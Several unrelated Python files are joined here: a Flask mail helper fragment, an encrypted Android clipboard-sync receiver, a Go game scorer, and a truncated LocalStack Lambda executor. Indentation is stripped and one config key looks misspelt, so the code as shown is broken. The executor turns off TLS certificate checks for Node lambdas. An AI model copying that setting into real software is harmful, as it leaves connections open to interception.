msg = Message(app.config['FLAKSY_MAIL_SUBJECT_PREFIX'] + subject, sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
|
acs_host.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from itertools import chain
from signal import signal, SIGINT, SIG_DFL
from socket import SOL_SOCKET, SO_BROADCAST
from subprocess import Popen, PIPE
from sys import argv, exit
from time import time, sleep
from threading import Thread
import SocketServer
from PyQt5 import QtCore, QtWidgets
from PyQt5.Qt import QApplication, QClipboard
from ipaddress import ip_address
import netifaces
import pynotify
import pysodium
import click
import cbor
HOST = ''
REG_PORT = 9361
CLIP_PORT = 9362
SETTINGS_ORG = 'dnet'
SETTINGS_APP = 'android-clipboard-sync'
SETTINGS_APP_KEY = 'appkey/public'
SETTINGS_PK_KEY = 'keypair/public'
SETTINGS_SK_KEY = 'keypair/secret'
def get_key():
s = QtCore.QSettings(SETTINGS_ORG, SETTINGS_APP)
pk = s.value(SETTINGS_PK_KEY)
sk = s.value(SETTINGS_SK_KEY)
ap = s.value(SETTINGS_APP_KEY)
if not (pk and sk):
pk, sk = pysodium.crypto_box_keypair()
s.setValue(SETTINGS_PK_KEY, QtCore.QByteArray(pk))
s.setValue(SETTINGS_SK_KEY, QtCore.QByteArray(sk))
s.sync()
return str(pk), str(sk), ap and str(ap)
@click.group()
def cli():
pass
@cli.command()
def register():
# TODO this whole thing could be a GUI
pk, sk, _ = get_key()
qrencode = Popen(['qrencode', '-8', '-t', 'ANSIUTF8'], stdin=PIPE)
qrencode.communicate(pk)
click.echo()
click.echo('Please scan the above QR code with the app to continue')
packets = []
class MyUDPHandler(SocketServer.BaseRequestHandler):
def handle(self):
data, socket = self.request
unsealed = pysodium.crypto_box_seal_open(data, pk, sk)
ap = unsealed[:pysodium.crypto_box_PUBLICKEYBYTES]
challenge = unsealed[pysodium.crypto_box_PUBLICKEYBYTES:]
packets.append(ap)
nonce = pysodium.randombytes(pysodium.crypto_box_NONCEBYTES)
response = pysodium.crypto_box(challenge, nonce, ap, sk)
dst = (src2dst(self.client_address[0]), REG_PORT)
socket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
socket.sendto(nonce + response, dst)
server = SocketServer.UDPServer((HOST, REG_PORT), MyUDPHandler)
while not packets:
server.handle_request()
unsealed = packets[0]
s = QtCore.QSettings(SETTINGS_ORG, SETTINGS_APP)
s.setValue(SETTINGS_APP_KEY, QtCore.QByteArray(unsealed))
s.sync()
click.echo('The app has been associated with this machine, its public key got stored')
nonces = {} # TODO clear nonces past their validity
@cli.command()
def receiver():
pk, sk, ap = get_key()
if ap is None:
click.echo("Error: no public key registered for the app could be found.", err=True)
click.echo("You have to register first using the 'register' command.", err=True)
exit(1)
app = QtWidgets.QApplication(argv)
cb = QApplication.clipboard()
pynotify.init("ACS")
class ClipboardWrapper(QtCore.QObject):
signal = QtCore.pyqtSignal(unicode)
def __init__(self):
QtCore.QObject.__init__(self)
self.signal.connect(self.copy_string)
def copy_string(self, value):
cb.setText(value, cb.Clipboard)
if cb.supportsSelection():
cb.setText(value, cb.Selection)
pynotify.Notification("Android Clipboard Sync", "Text was copied to the host clipboard").show()
cw = ClipboardWrapper()
class MyUDPHandler(SocketServer.BaseRequestHandler):
def handle(self):
data = self.request[0]
nonce = data[:pysodium.crypto_box_NONCEBYTES]
if nonce in nonces:
return
box = data[pysodium.crypto_box_NONCEBYTES:]
validity, payload = cbor.loads(pysodium.crypto_box_open(box, nonce, ap, sk))
if validity < time():
return
nonces[nonce] = validity
cw.signal.emit(payload)
server = SocketServer.UDPServer((HOST, CLIP_PORT), MyUDPHandler)
Thread(target=server.serve_forever).start()
signal(SIGINT, SIG_DFL)
click.echo("Receiver started, press Ctrl + C to exit")
exit(app.exec_())
def src2dst(src):
src_int = ip_num(src)
for interface in netifaces.interfaces():
for address in chain.from_iterable(netifaces.ifaddresses(interface).itervalues()):
netmask_str = address.get('netmask')
if netmask_str is None:
continue
try:
netmask = ip_num(netmask_str)
addr = ip_num(address['addr'])
except ValueError:
continue
if (netmask & addr) == (netmask & src_int):
broadcast = address.get('broadcast')
if broadcast:
return broadcast
return src
def ip_num(ip):
return int(ip_address(unicode(ip)))
if __name__ == '__main__':
cli()
|
sgf2score.py
|
#!/usr/bin/env python3
# Copyright 2017 Karl Sundequist Blomdahl <karl.sundequist.blomdahl@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=C0103, C0301
"""
Reads a _big_ SGF file from standard input and writes to standard output the
same games after they have been scored by a referee.
Usage: ./sgf2score.py < kgs_big.sgf > kgs_score.sgf
"""
import multiprocessing
import re
from subprocess import Popen, PIPE, DEVNULL
import sys
import tempfile
import threading
RE = re.compile(r'RE\[([^\]]+)\]')
PRINT_LOCK = threading.Lock()
def score_game(sgf):
"""
Returns the winner of the game in the given SGF file as
judged by `gnugo`.
"""
with tempfile.NamedTemporaryFile() as sgf_file:
sgf_file.write(sgf.encode())
sgf_file.flush()
# start-up our judge (gnugo)
gnugo = Popen(
['/usr/games/gnugo',
'--score', 'aftermath',
'--chinese-rules', '--positional-superko',
'-l', sgf_file.name],
stdin=DEVNULL,
stdout=PIPE,
stderr=DEVNULL
)
for line in gnugo.stdout:
line = line.decode('utf-8').strip()
if 'White wins by' in line: # White wins by 8.5 points
return 'W+' + line.split()[3]
elif 'Black wins by' in line: # Black wins by 32.5 points
return 'B+' + line.split()[3]
def main(every):
""" Main function """
threads = []
cpu_count = max(1, multiprocessing.cpu_count() - 2)
statistics = {
'num_scored': 0,
'num_wrong': 0
}
def _run_unknown(line, statistics):
winner = score_game(line)
if winner:
line = re.sub(RE, 'RE[' + winner + ']', line)
statistics['num_scored'] += 1
with PRINT_LOCK:
print(line)
def _run_check(line, statistics):
winner = score_game(line)
if winner:
if winner[:2] not in line:
statistics['num_wrong'] += 1
line = re.sub(RE, 'RE[' + winner + ']', line)
with PRINT_LOCK:
print(line)
for line in sys.stdin:
line = line.strip()
if "RE[?]" in line:
# start-up a background thread to determine the winner
thread = threading.Thread(target=_run_unknown, args=(line, statistics))
thread.start()
threads.append(thread)
else:
winner = RE.search(line)
resign = winner and 'R' in winner.group(1).upper()
if every and winner and not resign:
# start-up a background thread to check the winner
thread = threading.Thread(target=_run_check, args=(line, statistics))
thread.start()
threads.append(thread)
else:
with PRINT_LOCK:
print(line)
# poll for any threads that has finished their workload
while len(threads) >= cpu_count:
for thread in threads:
thread.join(0.001) # 1 ms
threads = [thread for thread in threads if thread.is_alive()]
# wait for all threads to finish
for thread in threads:
thread.join()
assert not thread.is_alive()
with PRINT_LOCK:
if statistics['num_scored'] > 0:
print('Arbitrated {} games without a winner'.format(statistics['num_scored']), file=sys.stderr)
if statistics['num_wrong'] > 0:
print('Arbitrated {} games with the wrong winner'.format(statistics['num_wrong']), file=sys.stderr)
if __name__ == '__main__':
main(every=any([arg for arg in sys.argv if arg == '--all']))
|
lambda_executors.py
|
import base64
import contextlib
import glob
import json
import logging
import os
import re
import subprocess
import sys
import threading
import time
import traceback
from multiprocessing import Process, Queue
from typing import Any, Dict, List, Optional, Tuple, Union
from localstack import config
from localstack.services.awslambda.lambda_utils import (
LAMBDA_RUNTIME_JAVA8,
LAMBDA_RUNTIME_JAVA8_AL2,
LAMBDA_RUNTIME_JAVA11,
LAMBDA_RUNTIME_PROVIDED,
)
from localstack.services.install import GO_LAMBDA_RUNTIME, INSTALL_PATH_LOCALSTACK_FAT_JAR
from localstack.utils import bootstrap
from localstack.utils.aws import aws_stack
from localstack.utils.aws.aws_models import LambdaFunction
from localstack.utils.aws.dead_letter_queue import (
lambda_error_to_dead_letter_queue,
sqs_error_to_dead_letter_queue,
)
from localstack.utils.aws.lambda_destinations import lambda_result_to_destination
from localstack.utils.cloudwatch.cloudwatch_util import cloudwatched, store_cloudwatch_logs
from localstack.utils.common import (
TMP_FILES,
CaptureOutput,
get_all_subclasses,
get_free_tcp_port,
in_docker,
json_safe,
last_index_of,
long_uid,
md5,
now,
run,
save_file,
short_uid,
to_bytes,
to_str,
)
from localstack.utils.docker import DOCKER_CLIENT, ContainerException, PortMappings
from localstack.utils.run import FuncThread
# constants
LAMBDA_EXECUTOR_JAR = INSTALL_PATH_LOCALSTACK_FAT_JAR
LAMBDA_EXECUTOR_CLASS = "cloud.localstack.LambdaExecutor"
LAMBDA_HANDLER_ENV_VAR_NAME = "_HANDLER"
EVENT_FILE_PATTERN = "%s/lambda.event.*.json" % config.TMP_FOLDER
LAMBDA_SERVER_UNIQUE_PORTS = 500
LAMBDA_SERVER_PORT_OFFSET = 5000
LAMBDA_API_UNIQUE_PORTS = 500
LAMBDA_API_PORT_OFFSET = 9000
MAX_ENV_ARGS_LENGTH = 20000
INTERNAL_LOG_PREFIX = "ls-daemon: "
# logger
LOG = logging.getLogger(__name__)
# maximum time a pre-allocated container can sit idle before getting killed
MAX_CONTAINER_IDLE_TIME_MS = 600 * 1000
# SQS event source name
EVENT_SOURCE_SQS = "aws:sqs"
# IP address of main Docker container (lazily initialized)
DOCKER_MAIN_CONTAINER_IP = None
# maps lambda arns to concurrency locks
LAMBDA_CONCURRENCY_LOCK = {}
# CWD folder of handler code in Lambda containers
DOCKER_TASK_FOLDER = "/var/task"
class InvocationException(Exception):
def __init__(self, message, log_output, result=None):
super(InvocationException, self).__init__(message)
self.log_output = log_output
self.result = result
class AdditionalInvocationOptions:
# Maps file keys to file paths. The keys can be used as placeholders in the env. variables
# and command args to reference files - e.g., given `files_to_add` as {"f1": "/local/path"} and
# `env_updates` as {"MYENV": "{f1}"}, the Lambda handler will receive an environment variable
# `MYENV=/lambda/path` and the file /lambda/path will be accessible to the Lambda handler
# (either locally, or inside Docker).
files_to_add: Dict[str, str]
# Environment variable updates to apply for the invocation
env_updates: Dict[str, str]
# Updated command to use for starting the Lambda process (or None)
updated_command: Optional[str]
def __init__(self, files_to_add=None, env_updates=None, updated_command=None):
self.files_to_add = files_to_add or {}
self.env_updates = env_updates or {}
self.updated_command = updated_command
class InvocationResult:
def __init__(self, result, log_output=""):
if isinstance(result, InvocationResult):
raise Exception("Unexpected invocation result type: %s" % result)
self.result = result
self.log_output = log_output or ""
class InvocationContext:
lambda_function: LambdaFunction
event: Dict[str, Any]
lambda_command: str # TODO: change to List[str] ?
docker_flags: str # TODO: change to List[str] ?
environment: Dict[str, str]
context: Dict[str, Any]
def __init__(
self,
lambda_function: LambdaFunction,
event: Dict,
environment=None,
context=None,
lambda_command=None,
docker_flags=None,
):
self.lambda_function = lambda_function
self.event = event
self.environment = {} if environment is None else environment
self.context = {} if context is None else context
self.lambda_command = lambda_command
self.docker_flags = docker_flags
class LambdaExecutorPlugin:
"""Plugin abstraction that allows to hook in additional functionality into the Lambda executors."""
INSTANCES: List["LambdaExecutorPlugin"] = []
def initialize(self):
"""Called once, for any active plugin to run initialization logic (e.g., downloading dependencies).
Uses lazy initialization - i.e., runs only after the first should_apply() call returns True"""
pass
def should_apply(self, context: InvocationContext) -> bool:
"""Whether the plugin logic should get applied for the given Lambda invocation context."""
return False
def prepare_invocation(
self, context: InvocationContext
) -> Optional[AdditionalInvocationOptions]:
"""Return additional invocation options for given Lambda invocation context."""
return None
def process_result(
self, context: InvocationContext, result: InvocationResult
) -> InvocationResult:
"""Optionally modify the result returned from the given Lambda invocation."""
return result
def init_function_configuration(self, lambda_function: LambdaFunction):
"""Initialize the configuration of the given function upon creation or function update."""
pass
def init_function_code(self, lambda_function: LambdaFunction):
"""Initialize the code of the given function upon creation or function update."""
pass
@classmethod
def get_plugins(cls) -> List["LambdaExecutorPlugin"]:
if not cls.INSTANCES:
classes = get_all_subclasses(LambdaExecutorPlugin)
cls.INSTANCES = [clazz() for clazz in classes]
return cls.INSTANCES
def get_from_event(event, key):
try:
return event["Records"][0][key]
except KeyError:
return None
def is_java_lambda(lambda_details):
runtime = getattr(lambda_details, "runtime", lambda_details)
return runtime in [LAMBDA_RUNTIME_JAVA8, LAMBDA_RUNTIME_JAVA8_AL2, LAMBDA_RUNTIME_JAVA11]
def is_nodejs_runtime(lambda_details):
runtime = getattr(lambda_details, "runtime", lambda_details) or ""
return runtime.startswith("nodejs")
def _store_logs(func_details, log_output, invocation_time=None, container_id=None):
log_group_name = "/aws/lambda/%s" % func_details.name()
container_id = container_id or short_uid()
invocation_time = invocation_time or int(time.time() * 1000)
invocation_time_secs = int(invocation_time / 1000)
time_str = time.strftime("%Y/%m/%d", time.gmtime(invocation_time_secs))
log_stream_name = "%s/[LATEST]%s" % (time_str, container_id)
return store_cloudwatch_logs(log_group_name, log_stream_name, log_output, invocation_time)
def get_main_endpoint_from_container():
global DOCKER_MAIN_CONTAINER_IP
if not config.HOSTNAME_FROM_LAMBDA and DOCKER_MAIN_CONTAINER_IP is None:
DOCKER_MAIN_CONTAINER_IP = False
try:
if in_docker():
DOCKER_MAIN_CONTAINER_IP = bootstrap.get_main_container_ip()
LOG.info("Determined main container target IP: %s" % DOCKER_MAIN_CONTAINER_IP)
except Exception as e:
container_name = bootstrap.get_main_container_name()
LOG.info(
'Unable to get IP address of main Docker container "%s": %s' % (container_name, e)
)
# return (1) predefined endpoint host, or (2) main container IP, or (3) Docker host (e.g., bridge IP)
return (
config.HOSTNAME_FROM_LAMBDA or DOCKER_MAIN_CONTAINER_IP or config.DOCKER_HOST_FROM_CONTAINER
)
def rm_docker_container(container_name_or_id, check_existence=False, safe=False):
# TODO: remove method / move to docker module
if not container_name_or_id:
return
if check_existence and container_name_or_id not in DOCKER_CLIENT.get_running_container_names():
# TODO: check names as well as container IDs!
return
try:
DOCKER_CLIENT.remove_container(container_name_or_id)
except Exception:
if not safe:
raise
class LambdaAsyncLocks:
locks: Dict[str, Union[threading.Semaphore, threading.Lock]]
creation_lock: threading.Lock
def __init__(self):
self.locks = {}
self.creation_lock = threading.Lock()
def assure_lock_present(
self, key: str, lock: Union[threading.Semaphore, threading.Lock]
) -> Union[threading.Semaphore, threading.Lock]:
with self.creation_lock:
return self.locks.setdefault(key, lock)
LAMBDA_ASYNC_LOCKS = LambdaAsyncLocks()
class LambdaExecutor(object):
"""Base class for Lambda executors. Subclasses must overwrite the _execute method"""
def __init__(self):
# keeps track of each function arn and the last time it was invoked
self.function_invoke_times = {}
def _prepare_environment(self, func_details):
# setup environment pre-defined variables for docker environment
result = func_details.envvars.copy()
# injecting aws credentials into docker environment if not provided
aws_stack.inject_test_credentials_into_env(result)
# injecting the region into the docker environment
aws_stack.inject_region_into_env(result, func_details.region())
return result
def execute(
self,
func_arn,
func_details,
event,
context=None,
version=None,
asynchronous=False,
callback=None,
lock_discriminator: str = None,
):
def do_execute(*args):
@cloudwatched("lambda")
def _run(func_arn=None):
with contextlib.ExitStack() as stack:
if lock_discriminator:
stack.enter_context(LAMBDA_ASYNC_LOCKS.locks[lock_discriminator])
# set the invocation time in milliseconds
invocation_time = int(time.time() * 1000)
# start the execution
raised_error = None
result = None
dlq_sent = None
try:
result = self._execute(func_arn, func_details, event, context, version)
except Exception as e:
raised_error = e
if asynchronous:
if get_from_event(event, "eventSource") == EVENT_SOURCE_SQS:
sqs_queue_arn = get_from_event(event, "eventSourceARN")
if sqs_queue_arn:
# event source is SQS, send event back to dead letter queue
dlq_sent = sqs_error_to_dead_letter_queue(
sqs_queue_arn, event, e
)
else:
# event source is not SQS, send back to lambda dead letter queue
lambda_error_to_dead_letter_queue(func_details, event, e)
raise e
finally:
self.function_invoke_times[func_arn] = invocation_time
callback and callback(
result, func_arn, event, error=raised_error, dlq_sent=dlq_sent
)
lambda_result_to_destination(
func_details, event, result, asynchronous, raised_error
)
# return final result
return result
return _run(func_arn=func_arn)
# Inform users about asynchronous mode of the lambda execution.
if asynchronous:
LOG.debug(
"Lambda executed in Event (asynchronous) mode, no response will be returned to caller"
)
FuncThread(do_execute).start()
return InvocationResult(None, log_output="Lambda executed asynchronously.")
return do_execute()
def _execute(self, func_arn, func_details, event, context=None, version=None):
"""This method must be overwritten by subclasses."""
raise NotImplementedError
def startup(self):
"""Called once during startup - can be used, e.g., to prepare Lambda Docker environment"""
pass
def cleanup(self, arn=None):
"""Called once during startup - can be used, e.g., to clean up left-over Docker containers"""
pass
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
"""Make the given file available to the Lambda process (e.g., by copying into the container) for the
given invocation context; Returns the path to the file that will be available to the Lambda handler."""
raise NotImplementedError
def apply_plugin_patches(self, inv_context: InvocationContext):
"""Loop through the list of plugins, and apply their patches to the invocation context (if applicable)"""
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
# initialize, if not done yet
if not hasattr(plugin, "_initialized"):
LOG.debug("Initializing Lambda executor plugin %s", plugin.__class__)
plugin.initialize()
plugin._initialized = True
# invoke plugin to prepare invocation
inv_options = plugin.prepare_invocation(inv_context)
if not inv_options:
continue
# copy files
file_keys_map = {}
for key, file_path in inv_options.files_to_add.items():
file_in_container = self.provide_file_to_lambda(file_path, inv_context)
file_keys_map[key] = file_in_container
# replace placeholders like "{<fileKey>}" with corresponding file path
for key, file_path in file_keys_map.items():
for env_key, env_value in inv_options.env_updates.items():
inv_options.env_updates[env_key] = str(env_value).replace(
"{%s}" % key, file_path
)
if inv_options.updated_command:
inv_options.updated_command = inv_options.updated_command.replace(
"{%s}" % key, file_path
)
inv_context.lambda_command = inv_options.updated_command
# update environment
inv_context.environment.update(inv_options.env_updates)
def process_result_via_plugins(
self, inv_context: InvocationContext, invocation_result: InvocationResult
) -> InvocationResult:
"""Loop through the list of plugins, and apply their post-processing logic to the Lambda invocation result."""
for plugin in LambdaExecutorPlugin.get_plugins():
if not plugin.should_apply(inv_context):
continue
invocation_result = plugin.process_result(inv_context, invocation_result)
return invocation_result
class ContainerInfo:
"""Contains basic information about a docker container."""
def __init__(self, name, entry_point):
self.name = name
self.entry_point = entry_point
class LambdaExecutorContainers(LambdaExecutor):
"""Abstract executor class for executing Lambda functions in Docker containers"""
def execute_in_container(
self, func_details, env_vars, command, docker_flags=None, stdin=None, background=False
) -> Tuple[bytes, bytes]:
raise NotImplementedError
def run_lambda_executor(self, event=None, func_details=None, env_vars=None, command=None):
env_vars = dict(env_vars or {})
runtime = func_details.runtime or ""
stdin_str = None
event_body = event if event is not None else env_vars.get("AWS_LAMBDA_EVENT_BODY")
event_body = json.dumps(event_body) if isinstance(event_body, dict) else event_body
event_body = event_body or ""
is_large_event = len(event_body) > MAX_ENV_ARGS_LENGTH
is_provided = runtime.startswith(LAMBDA_RUNTIME_PROVIDED)
if (
not is_large_event
and func_details
and is_provided
and env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1"
):
# Note: certain "provided" runtimes (e.g., Rust programs) can block if we pass in
# the event payload via stdin, hence we rewrite the command to "echo ... | ..." below
env_updates = {
"AWS_LAMBDA_EVENT_BODY": to_str(
event_body
), # Note: seems to be needed for provided runtimes!
"DOCKER_LAMBDA_USE_STDIN": "1",
}
env_vars.update(env_updates)
# Note: $AWS_LAMBDA_COGNITO_IDENTITY='{}' causes Rust Lambdas to hang
env_vars.pop("AWS_LAMBDA_COGNITO_IDENTITY", None)
if is_large_event:
# in case of very large event payloads, we need to pass them via stdin
LOG.debug(
"Received large Lambda event payload (length %s) - passing via stdin"
% len(event_body)
)
env_vars["DOCKER_LAMBDA_USE_STDIN"] = "1"
if env_vars.get("DOCKER_LAMBDA_USE_STDIN") == "1":
stdin_str = event_body
if not is_provided:
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
elif "AWS_LAMBDA_EVENT_BODY" not in env_vars:
env_vars["AWS_LAMBDA_EVENT_BODY"] = to_str(event_body)
# apply plugin patches
inv_context = InvocationContext(func_details, event, environment=env_vars)
self.apply_plugin_patches(inv_context)
docker_flags = config.LAMBDA_DOCKER_FLAGS or ""
if inv_context.docker_flags:
docker_flags = f"{docker_flags} {inv_context.docker_flags}"
event_stdin_bytes = stdin_str and to_bytes(stdin_str)
error = None
try:
result, log_output = self.execute_in_container(
func_details, env_vars, command, docker_flags=docker_flags, stdin=event_stdin_bytes
)
except ContainerException as e:
result = e.stdout or ""
log_output = e.stderr or ""
error = e
try:
result = to_str(result).strip()
except Exception:
pass
log_output = to_str(log_output).strip()
# Note: The user's code may have been logging to stderr, in which case the logs
# will be part of the "result" variable here. Hence, make sure that we extract
# only the *last* line of "result" and consider anything above that as log output.
if isinstance(result, str) and "\n" in result:
lines = result.split("\n")
idx = last_index_of(
lines, lambda line: line and not line.startswith(INTERNAL_LOG_PREFIX)
)
if idx >= 0:
result = lines[idx]
additional_logs = "\n".join(lines[:idx] + lines[idx + 1 :])
log_output += "\n%s" % additional_logs
log_formatted = log_output.strip().replace("\n", "\n> ")
func_arn = func_details and func_details.arn()
LOG.debug(
"Lambda %s result / log output:\n%s\n> %s" % (func_arn, result.strip(), log_formatted)
)
# store log output - TODO get live logs from `process` above?
_store_logs(func_details, log_output)
if error:
raise InvocationException(
"Lambda process returned with error. Result: %s. Output:\n%s"
% (result, log_output),
log_output,
result,
) from error
# create result
invocation_result = InvocationResult(result, log_output=log_output)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def prepare_event(self, environment: Dict, event_body: str) -> bytes:
"""Return the event as a stdin string."""
# amend the environment variables for execution
environment["AWS_LAMBDA_EVENT_BODY"] = event_body
return event_body.encode()
def _execute(
self, func_arn: str, func_details: LambdaFunction, event: Dict, context=None, version=None
):
runtime = func_details.runtime
handler = func_details.handler
environment = self._prepare_environment(func_details)
# configure USE_SSL in environment
if config.USE_SSL:
environment["USE_SSL"] = "1"
# prepare event body
if not event:
LOG.info('Empty event body specified for invocation of Lambda "%s"' % func_arn)
event = {}
event_body = json.dumps(json_safe(event))
event_bytes_for_stdin = self.prepare_event(environment, event_body)
Util.inject_endpoints_into_env(environment)
environment["EDGE_PORT"] = str(config.EDGE_PORT)
environment[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
if os.environ.get("HTTP_PROXY"):
environment["HTTP_PROXY"] = os.environ["HTTP_PROXY"]
if func_details.timeout:
environment["AWS_LAMBDA_FUNCTION_TIMEOUT"] = str(func_details.timeout)
if context:
environment["AWS_LAMBDA_FUNCTION_NAME"] = context.function_name
environment["AWS_LAMBDA_FUNCTION_VERSION"] = context.function_version
environment["AWS_LAMBDA_FUNCTION_INVOKED_ARN"] = context.invoked_function_arn
environment["AWS_LAMBDA_COGNITO_IDENTITY"] = json.dumps(context.cognito_identity or {})
if context.client_context is not None:
environment["AWS_LAMBDA_CLIENT_CONTEXT"] = json.dumps(
to_str(base64.b64decode(to_bytes(context.client_context)))
)
# pass JVM options to the Lambda environment, if configured
if config.LAMBDA_JAVA_OPTS and is_java_lambda(runtime):
if environment.get("JAVA_TOOL_OPTIONS"):
LOG.info(
"Skip setting LAMBDA_JAVA_OPTS as JAVA_TOOL_OPTIONS already defined in Lambda env vars"
)
else:
LOG.debug(
"Passing JVM options to container environment: JAVA_TOOL_OPTIONS=%s"
% config.LAMBDA_JAVA_OPTS
)
environment["JAVA_TOOL_OPTIONS"] = config.LAMBDA_JAVA_OPTS
# accept any self-signed certificates for outgoing calls from the Lambda
if is_nodejs_runtime(runtime):
environment["NODE_TLS_REJECT_UNAUTHORIZED"] = "0"
# run Lambda executor and fetch invocation result
LOG.info("Running lambda: %s" % func_details.arn())
result = self.run_lambda_executor(
event=event_bytes_for_stdin, env_vars=environment, func_details=func_details
)
return result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
if config.LAMBDA_REMOTE_DOCKER:
LOG.info("TODO: copy file into container for LAMBDA_REMOTE_DOCKER=1 - %s", local_file)
return local_file
mountable_file = Util.get_host_path_for_path_in_docker(local_file)
_, extension = os.path.splitext(local_file)
target_file_name = f"{md5(local_file)}{extension}"
target_path = f"/tmp/{target_file_name}"
inv_context.docker_flags = inv_context.docker_flags or ""
inv_context.docker_flags += f"-v {mountable_file}:{target_path}"
return target_path
class LambdaExecutorReuseContainers(LambdaExecutorContainers):
"""Executor class for executing Lambda functions in re-usable Docker containers"""
def __init__(self):
super(LambdaExecutorReuseContainers, self).__init__()
# locking thread for creation/destruction of docker containers.
self.docker_container_lock = threading.RLock()
# On each invocation we try to construct a port unlikely to conflict
# with a previously invoked lambda function. This is a problem with at
# least the lambci/lambda:go1.x container, which execs a go program that
# attempts to bind to the same default port.
self.next_port = 0
self.max_port = LAMBDA_SERVER_UNIQUE_PORTS
self.port_offset = LAMBDA_SERVER_PORT_OFFSET
def execute_in_container(
self, func_details, env_vars, command, docker_flags=None, stdin=None, background=False
) -> Tuple[bytes, bytes]:
func_arn = func_details.arn()
lambda_cwd = func_details.cwd
runtime = func_details.runtime
handler = func_details.handler
# check whether the Lambda has been invoked before
has_been_invoked_before = func_arn in self.function_invoke_times
# Choose a port for this invocation
with self.docker_container_lock:
env_vars["_LAMBDA_SERVER_PORT"] = str(self.next_port + self.port_offset)
self.next_port = (self.next_port + 1) % self.max_port
# create/verify the docker container is running.
LOG.debug(
'Priming docker container with runtime "%s" and arn "%s".',
runtime,
func_arn,
)
container_info = self.prime_docker_container(
func_details, dict(env_vars), lambda_cwd, docker_flags
)
if not command and handler:
command = container_info.entry_point.split()
command.append(handler)
# determine files to be copied into the container
if not has_been_invoked_before and config.LAMBDA_REMOTE_DOCKER:
# if this is the first invocation: copy the entire folder into the container
DOCKER_CLIENT.copy_into_container(
container_info.name, f"{lambda_cwd}/.", DOCKER_TASK_FOLDER
)
return DOCKER_CLIENT.exec_in_container(
container_name_or_id=container_info.name,
command=command,
interactive=True,
env_vars=env_vars,
stdin=stdin,
)
def _execute(self, func_arn, *args, **kwargs):
if not LAMBDA_CONCURRENCY_LOCK.get(func_arn):
concurrency_lock = threading.RLock()
LAMBDA_CONCURRENCY_LOCK[func_arn] = concurrency_lock
with LAMBDA_CONCURRENCY_LOCK[func_arn]:
return super(LambdaExecutorReuseContainers, self)._execute(func_arn, *args, **kwargs)
def startup(self):
self.cleanup()
# start a process to remove idle containers
if config.LAMBDA_REMOVE_CONTAINERS:
self.start_idle_container_destroyer_interval()
def cleanup(self, arn=None):
if arn:
self.function_invoke_times.pop(arn, None)
return self.destroy_docker_container(arn)
self.function_invoke_times = {}
return self.destroy_existing_docker_containers()
def prime_docker_container(self, func_details, env_vars, lambda_cwd, docker_flags=None):
"""
Prepares a persistent docker container for a specific function.
:param func_details: The Details of the lambda function.
:param env_vars: The environment variables for the lambda.
:param lambda_cwd: The local directory containing the code for the lambda function.
:return: ContainerInfo class containing the container name and default entry point.
"""
with self.docker_container_lock:
# Get the container name and id.
func_arn = func_details.arn()
container_name = self.get_container_name(func_arn)
status = self.get_docker_container_status(func_arn)
LOG.debug('Priming Docker container (status "%s"): %s' % (status, container_name))
docker_image = Util.docker_image_for_lambda(func_details)
# Container is not running or doesn't exist.
if status < 1:
# Make sure the container does not exist in any form/state.
self.destroy_docker_container(func_arn)
# get container startup command and run it
LOG.debug("Creating container: %s" % container_name)
self.create_container(func_details, env_vars, lambda_cwd, docker_flags)
if config.LAMBDA_REMOTE_DOCKER:
LOG.debug(
'Copying files to container "%s" from "%s".' % (container_name, lambda_cwd)
)
DOCKER_CLIENT.copy_into_container(
container_name, "%s/." % lambda_cwd, DOCKER_TASK_FOLDER
)
LOG.debug("Starting docker-reuse Lambda container: %s", container_name)
DOCKER_CLIENT.start_container(container_name)
# give the container some time to start up
time.sleep(1)
container_network = self.get_docker_container_network(func_arn)
entry_point = DOCKER_CLIENT.get_image_entrypoint(docker_image)
LOG.debug(
'Using entrypoint "%s" for container "%s" on network "%s".'
% (entry_point, container_name, container_network)
)
return ContainerInfo(container_name, entry_point)
def create_container(self, func_details, env_vars, lambda_cwd, docker_flags=None):
docker_image = Util.docker_image_for_lambda(func_details)
container_name = self.get_container_name(func_details.arn())
# make sure we set LOCALSTACK_HOSTNAME
Util.inject_endpoints_into_env(env_vars)
# make sure AWS_LAMBDA_EVENT_BODY is not set (otherwise causes issues with "docker exec ..." above)
env_vars.pop("AWS_LAMBDA_EVENT_BODY", None)
network = config.LAMBDA_DOCKER_NETWORK
additional_flags = docker_flags
dns = config.LAMBDA_DOCKER_DNS
mount_volumes = not config.LAMBDA_REMOTE_DOCKER
lambda_cwd_on_host = Util.get_host_path_for_path_in_docker(lambda_cwd)
if ":" in lambda_cwd and "\\" in lambda_cwd:
lambda_cwd_on_host = Util.format_windows_path(lambda_cwd_on_host)
mount_volumes = [(lambda_cwd_on_host, DOCKER_TASK_FOLDER)] if mount_volumes else None
if os.environ.get("HOSTNAME"):
env_vars["HOSTNAME"] = os.environ.get("HOSTNAME")
env_vars["EDGE_PORT"] = config.EDGE_PORT
LOG.debug(
"Creating docker-reuse Lambda container %s from image %s", container_name, docker_image
)
return DOCKER_CLIENT.create_container(
image_name=docker_image,
remove=True,
interactive=True,
name=container_name,
entrypoint="/bin/bash",
network=network,
env_vars=env_vars,
dns=dns,
mount_volumes=mount_volumes,
additional_flags=additional_flags,
)
def destroy_docker_container(self, func_arn):
"""
Stops and/or removes a docker container for a specific lambda function ARN.
:param func_arn: The ARN of the lambda function.
:return: None
"""
with self.docker_container_lock:
status = self.get_docker_container_status(func_arn)
# Get the container name and id.
